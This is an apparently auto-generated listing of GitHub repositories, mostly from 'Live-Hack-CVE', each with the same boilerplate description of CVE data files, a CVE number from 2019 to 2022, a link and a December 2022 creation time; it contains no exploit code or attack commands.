**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4249](https://github.com/Live-Hack-CVE/CVE-2019-4249) create time: 2022-12-23T11:33:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4234 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4234](https://github.com/Live-Hack-CVE/CVE-2019-4234) create time: 2022-12-23T11:33:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4235](https://github.com/Live-Hack-CVE/CVE-2019-4235) create time: 2022-12-23T11:33:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4237 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4237](https://github.com/Live-Hack-CVE/CVE-2019-4237) create time: 2022-12-23T11:33:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11810](https://github.com/Live-Hack-CVE/CVE-2019-11810) create time: 2022-12-23T11:33:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-0230 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-0230](https://github.com/Live-Hack-CVE/CVE-2019-0230) create time: 2022-12-23T11:33:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10808 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10808](https://github.com/Live-Hack-CVE/CVE-2019-10808) create time: 2022-12-23T11:30:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4305](https://github.com/Live-Hack-CVE/CVE-2019-4305) create time: 2022-12-23T11:28:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4304 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4304](https://github.com/Live-Hack-CVE/CVE-2019-4304) create time: 2022-12-23T11:28:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4321 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4321](https://github.com/Live-Hack-CVE/CVE-2019-4321) create time: 2022-12-23T11:28:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4536](https://github.com/Live-Hack-CVE/CVE-2019-4536) create time: 2022-12-23T11:28:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4513 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4513](https://github.com/Live-Hack-CVE/CVE-2019-4513) create time: 2022-12-23T11:28:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4482 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4482](https://github.com/Live-Hack-CVE/CVE-2019-4482) create time: 2022-12-23T11:28:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17531](https://github.com/Live-Hack-CVE/CVE-2020-17531) create time: 2022-12-23T12:07:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-24939 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-24939](https://github.com/Live-Hack-CVE/CVE-2020-24939) create time: 2022-12-23T11:35:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28460 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28460](https://github.com/Live-Hack-CVE/CVE-2020-28460) create time: 2022-12-23T11:35:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28448](https://github.com/Live-Hack-CVE/CVE-2020-28448) create time: 2022-12-23T11:35:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7774](https://github.com/Live-Hack-CVE/CVE-2020-7774) create time: 2022-12-23T11:34:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7788](https://github.com/Live-Hack-CVE/CVE-2020-7788) create time: 2022-12-23T11:34:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28271](https://github.com/Live-Hack-CVE/CVE-2020-28271) create time: 2022-12-23T11:34:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28268 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28268](https://github.com/Live-Hack-CVE/CVE-2020-28268) create time: 2022-12-23T11:34:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28269 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28269](https://github.com/Live-Hack-CVE/CVE-2020-28269) create time: 2022-12-23T11:34:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7746](https://github.com/Live-Hack-CVE/CVE-2020-7746) create time: 2022-12-23T11:33:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7766 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7766](https://github.com/Live-Hack-CVE/CVE-2020-7766) create time: 2022-12-23T11:33:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7768 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7768](https://github.com/Live-Hack-CVE/CVE-2020-7768) create time: 2022-12-23T11:33:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7770](https://github.com/Live-Hack-CVE/CVE-2020-7770) create time: 2022-12-23T11:33:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7709](https://github.com/Live-Hack-CVE/CVE-2020-7709) create time: 2022-12-23T11:33:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7748](https://github.com/Live-Hack-CVE/CVE-2020-7748) create time: 2022-12-23T11:33:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7737](https://github.com/Live-Hack-CVE/CVE-2020-7737) create time: 2022-12-23T11:33:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7736](https://github.com/Live-Hack-CVE/CVE-2020-7736) create time: 2022-12-23T11:33:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7727 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7727](https://github.com/Live-Hack-CVE/CVE-2020-7727) create time: 2022-12-23T11:32:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7726 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7726](https://github.com/Live-Hack-CVE/CVE-2020-7726) create time: 2022-12-23T11:32:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7725](https://github.com/Live-Hack-CVE/CVE-2020-7725) create time: 2022-12-23T11:32:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7724 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7724](https://github.com/Live-Hack-CVE/CVE-2020-7724) create time: 2022-12-23T11:32:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7723 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7723](https://github.com/Live-Hack-CVE/CVE-2020-7723) create time: 2022-12-23T11:32:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7722 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7722](https://github.com/Live-Hack-CVE/CVE-2020-7722) create time: 2022-12-23T11:32:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7720 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7720](https://github.com/Live-Hack-CVE/CVE-2020-7720) create time: 2022-12-23T11:32:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7721 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7721](https://github.com/Live-Hack-CVE/CVE-2020-7721) create time: 2022-12-23T11:32:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7719 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7719](https://github.com/Live-Hack-CVE/CVE-2020-7719) create time: 2022-12-23T11:31:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7718 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7718](https://github.com/Live-Hack-CVE/CVE-2020-7718) create time: 2022-12-23T11:31:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35501](https://github.com/Live-Hack-CVE/CVE-2020-35501) create time: 2022-12-23T11:31:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7714](https://github.com/Live-Hack-CVE/CVE-2020-7714) create time: 2022-12-23T11:31:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7715 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7715](https://github.com/Live-Hack-CVE/CVE-2020-7715) create time: 2022-12-23T11:31:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45036](https://github.com/Live-Hack-CVE/CVE-2021-45036) create time: 2022-12-23T12:14:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3975 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3975](https://github.com/Live-Hack-CVE/CVE-2021-3975) create time: 2022-12-23T12:11:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25642](https://github.com/Live-Hack-CVE/CVE-2021-25642) create time: 2022-12-23T12:11:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25463](https://github.com/Live-Hack-CVE/CVE-2021-25463) create time: 2022-12-23T12:10:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31693](https://github.com/Live-Hack-CVE/CVE-2021-31693) create time: 2022-12-23T12:09:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31740 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31740](https://github.com/Live-Hack-CVE/CVE-2021-31740) create time: 2022-12-23T12:09:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4242 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4242](https://github.com/Live-Hack-CVE/CVE-2021-4242) create time: 2022-12-23T12:08:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26948](https://github.com/Live-Hack-CVE/CVE-2021-26948) create time: 2022-12-23T12:07:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26252](https://github.com/Live-Hack-CVE/CVE-2021-26252) create time: 2022-12-23T12:06:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32472](https://github.com/Live-Hack-CVE/CVE-2021-32472) create time: 2022-12-23T12:06:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23442](https://github.com/Live-Hack-CVE/CVE-2021-23442) create time: 2022-12-23T12:05:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23452 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23452](https://github.com/Live-Hack-CVE/CVE-2021-23452) create time: 2022-12-23T12:05:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32811 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32811](https://github.com/Live-Hack-CVE/CVE-2021-32811) create time: 2022-12-23T12:05:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23419](https://github.com/Live-Hack-CVE/CVE-2021-23419) create time: 2022-12-23T12:05:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32807](https://github.com/Live-Hack-CVE/CVE-2021-32807) create time: 2022-12-23T12:05:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4091 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4091](https://github.com/Live-Hack-CVE/CVE-2021-4091) create time: 2022-12-23T12:05:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27582](https://github.com/Live-Hack-CVE/CVE-2021-27582) create time: 2022-12-23T12:05:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26259](https://github.com/Live-Hack-CVE/CVE-2021-26259) create time: 2022-12-23T11:33:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-32476 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-32476](https://github.com/Live-Hack-CVE/CVE-2021-32476) create time: 2022-12-23T11:29:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46828](https://github.com/Live-Hack-CVE/CVE-2021-46828) create time: 2022-12-23T11:29:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-44519 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-44519](https://github.com/Live-Hack-CVE/CVE-2021-44519) create time: 2022-12-23T11:26:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24957 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24957](https://github.com/Live-Hack-CVE/CVE-2021-24957) create time: 2022-12-23T11:26:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25745 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25745](https://github.com/Live-Hack-CVE/CVE-2021-25745) create time: 2022-12-23T11:26:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25746](https://github.com/Live-Hack-CVE/CVE-2021-25746) create time: 2022-12-23T11:24:58Z

**no description** : [nidhihcl/linux-4.19.72_CVE-2022-29581](https://github.com/nidhihcl/linux-4.19.72_CVE-2022-29581) create time: 2022-12-23T12:33:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3361](https://github.com/Live-Hack-CVE/CVE-2022-3361) create time: 2022-12-23T12:16:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41944 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41944](https://github.com/Live-Hack-CVE/CVE-2022-41944) create time: 2022-12-23T12:16:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3384 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3384](https://github.com/Live-Hack-CVE/CVE-2022-3384) create time: 2022-12-23T12:16:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41957 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41957](https://github.com/Live-Hack-CVE/CVE-2022-41957) create time: 2022-12-23T12:16:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39339 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39339](https://github.com/Live-Hack-CVE/CVE-2022-39339) create time: 2022-12-23T12:16:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39338](https://github.com/Live-Hack-CVE/CVE-2022-39338) create time: 2022-12-23T12:16:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3751](https://github.com/Live-Hack-CVE/CVE-2022-3751) create time: 2022-12-23T12:16:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3747](https://github.com/Live-Hack-CVE/CVE-2022-3747) create time: 2022-12-23T12:16:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25848 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25848](https://github.com/Live-Hack-CVE/CVE-2022-25848) create time: 2022-12-23T12:16:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21126](https://github.com/Live-Hack-CVE/CVE-2022-21126) create time: 2022-12-23T12:16:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45202](https://github.com/Live-Hack-CVE/CVE-2022-45202) create time: 2022-12-23T12:16:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45343 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45343](https://github.com/Live-Hack-CVE/CVE-2022-45343) create time: 2022-12-23T12:16:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36960 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36960](https://github.com/Live-Hack-CVE/CVE-2022-36960) create time: 2022-12-23T12:16:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45204](https://github.com/Live-Hack-CVE/CVE-2022-45204) create time: 2022-12-23T12:16:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40799](https://github.com/Live-Hack-CVE/CVE-2022-40799) create time: 2022-12-23T12:15:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44635](https://github.com/Live-Hack-CVE/CVE-2022-44635) create time: 2022-12-23T12:15:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36964 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36964](https://github.com/Live-Hack-CVE/CVE-2022-36964) create time: 2022-12-23T12:15:45Z

